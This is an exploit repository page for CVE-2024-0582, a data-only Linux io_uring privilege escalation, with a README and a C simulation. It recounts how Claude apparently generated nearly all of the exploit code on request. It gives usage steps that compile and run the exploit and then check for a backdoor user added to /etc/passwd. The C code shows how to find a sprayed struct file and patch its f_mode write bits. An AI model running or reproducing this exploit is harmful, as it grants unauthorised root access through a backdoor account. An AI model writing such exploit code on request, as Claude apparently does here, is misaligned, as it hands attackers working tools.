Related vulnerability
Description
A data-only attack based on CVE-2024-0582
Introduction
# CVE-2024-0582
A data-only attack based on CVE-2024-0582
## Description
The exploit follows the strategy in [this blog post](https://blog.exodusintel.com/2024/03/27/mind-the-patch-gap-exploiting-an-io_uring-vulnerability-in-ubuntu/), except that I didn't use a child process to open files.
I found that some exploits on GitHub follow the strategy in [this write-up](https://anatomic.rip/cve-2023-2598/).
After I reproduced the exploit with socket-based control-flow hijacking, I tried to implement it as a data-only attack, which does not seem to be open-sourced yet.
## Try Claude
I fed the two write-ups above and [https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582/blob/main/exploit.c](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582/blob/main/exploit.c) into Claude and asked:
```
Could you modify the code to fit in the data-only attack? It means open file instead of sock, seek ext4_file_operations instead of egg, delete the control flow hijack and modify the file permission.
```
This generated code that opens the file in a child process, which I find hard to debug, so I said:
```
Why not open file in the process, not using a child?
```
It then generated almost exactly the code that is in this repository.
Then I:
1. Adjusted the backdoor string for easier understanding.
2. Adjusted the file mode flags based on the kernel source code; the values Claude generated were wrong.
3. Increased the number of fds so that more `struct file` objects are sprayed, since `struct file` is much smaller than `struct sock` and more objects are needed to fill the same pages.
## Usage
1. Verify `ext4_fops_offset` for the target kernel.
2. Verify the file mode flags against the target kernel's source.
3. Consider increasing the number of fds to spray more file structs.
4. Compile and run (the source file in this snapshot is named `dataonly.c`; substitute that name if you compile from the snapshot).
```bash
gcc exploit.c -o exploit -luring
./exploit
```
5. Check that the backdoor user was added to `/etc/passwd`, or simply log out and log back in as the backdoor user.
```bash
cat /etc/passwd # /etc/passwd is world-readable, so no sudo is needed
```
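The three things the usage list asks you to verify (the `ext4_file_operations` address, the `struct file` layout, and the file mode flags) are exactly the inputs of the data-only step: find a sprayed `struct file` in the reclaimed page by its `f_op` pointer, then set the bits `vfs_write()` requires in its `f_mode`. The following is an added example written for this page, not code from the repository or from either write-up. It simulates that step in userland on a constructed buffer: the `FMODE_*` values are those of `include/linux/fs.h` in recent kernels (verify them for your target), `FILE_FOP_OFF` and `FILE_FMODE_OFF` are placeholder offsets that must be taken from the target kernel (for example with `pahole -C file`), and `FAKE_EXT4_FOPS` is a made-up address standing in for the real `ext4_file_operations` symbol value.

```c
/*
 * Added example (not part of the original repository): userland simulation
 * of the data-only step. A buffer stands in for the page reclaimed by the
 * sprayed struct file objects; we locate a struct file by its f_op pointer
 * and patch f_mode so that vfs_write() would accept writes on a file that
 * was opened O_RDONLY.
 *
 * Assumptions: FMODE_* bit positions from include/linux/fs.h of recent
 * 5.x/6.x kernels; FILE_FOP_OFF / FILE_FMODE_OFF are placeholder offsets
 * into struct file; FAKE_EXT4_FOPS is a placeholder kallsyms value.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* From include/linux/fs.h (assumed unchanged for the target kernel). */
#define FMODE_READ       (1u << 0)
#define FMODE_WRITE      (1u << 1)
#define FMODE_LSEEK      (1u << 2)
#define FMODE_PREAD      (1u << 3)
#define FMODE_PWRITE     (1u << 4)
#define FMODE_CAN_READ   (1u << 17)
#define FMODE_CAN_WRITE  (1u << 18)
#define FMODE_OPENED     (1u << 19)

#define PAGE_SIZE_BYTES  4096
#define FILE_FOP_OFF     0x28   /* placeholder: offsetof(struct file, f_op)   */
#define FILE_FMODE_OFF   0x44   /* placeholder: offsetof(struct file, f_mode) */
#define FAKE_EXT4_FOPS   0xffffffff81e1a2c0ULL /* placeholder symbol address */

/* Mirror of the two f_mode checks in vfs_write(): returns 0 when the write
 * would be allowed, otherwise the negative errno the kernel would return. */
int vfs_write_mode_check(uint32_t f_mode)
{
    if (!(f_mode & FMODE_WRITE))
        return -9;   /* -EBADF */
    if (!(f_mode & FMODE_CAN_WRITE))
        return -22;  /* -EINVAL */
    return 0;
}

/* The data-only patch: keep whatever the kernel set at open() and add the
 * two bits vfs_write() insists on. Nothing else in the struct is touched. */
uint32_t make_writable_mode(uint32_t f_mode)
{
    return f_mode | FMODE_WRITE | FMODE_CAN_WRITE;
}

/* Scan 8-byte-aligned words for the ext4_file_operations address; the
 * struct file then starts FILE_FOP_OFF bytes before the match. Returns the
 * byte offset of the struct, or -1 if no candidate was found (in the real
 * exploit that usually means the spray did not reclaim the page). */
long find_file_struct(const uint8_t *page, size_t len, uint64_t ext4_fops)
{
    for (size_t off = FILE_FOP_OFF; off + sizeof(uint64_t) <= len; off += 8) {
        uint64_t word;
        memcpy(&word, page + off, sizeof word);
        if (word == ext4_fops)
            return (long)(off - FILE_FOP_OFF);
    }
    return -1;
}

/* Rewrite f_mode of the struct file at `base` in place; returns the new mode. */
uint32_t patch_file_mode(uint8_t *page, size_t base)
{
    uint32_t mode;
    memcpy(&mode, page + base + FILE_FMODE_OFF, sizeof mode);
    mode = make_writable_mode(mode);
    memcpy(page + base + FILE_FMODE_OFF, &mode, sizeof mode);
    return mode;
}

/* Constructed sample page: zeros plus one fake struct file at 0x100 whose
 * f_mode is a representative O_RDONLY mode (read-only, no write bits). */
size_t build_sample_page(uint8_t *page, size_t len)
{
    const size_t base = 0x100;
    uint64_t fops = FAKE_EXT4_FOPS;
    uint32_t mode = FMODE_READ | FMODE_LSEEK | FMODE_PREAD | FMODE_PWRITE |
                    FMODE_CAN_READ | FMODE_OPENED;
    memset(page, 0, len);
    memcpy(page + base + FILE_FOP_OFF, &fops, sizeof fops);
    memcpy(page + base + FILE_FMODE_OFF, &mode, sizeof mode);
    return base;
}

int main(void)
{
    static uint8_t page[PAGE_SIZE_BYTES];
    size_t planted = build_sample_page(page, sizeof page);
    long found = find_file_struct(page, sizeof page, FAKE_EXT4_FOPS);
    if (found < 0 || (size_t)found != planted) {
        fprintf(stderr, "struct file not found: check ext4_fops_offset / spray\n");
        return 1;
    }
    uint32_t before, after;
    memcpy(&before, page + found + FILE_FMODE_OFF, sizeof before);
    after = patch_file_mode(page, (size_t)found);
    printf("struct file at page+0x%lx: f_mode 0x%x (vfs_write -> %d) => 0x%x (vfs_write -> %d)\n",
           (unsigned long)found, before, vfs_write_mode_check(before),
           after, vfs_write_mode_check(after));
    return 0;
}
```

Against a real target, `vfs_write_mode_check()` is the reason step 2 matters: if the wrong bits are set, the kernel answers `EBADF` or `EINVAL` on the subsequent `write(2)` to the read-only fd rather than crashing, so a failed write after a successful scan points at the flag values, while a failed scan points at `ext4_fops_offset` or at the spray size.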
File snapshot
[4.0K] /data/pocs/9a3f061531f76cd10de27f5336386f55a2582fe9
├── [6.5K] dataonly.c
└── [1.8K] README.md
0 directories, 2 files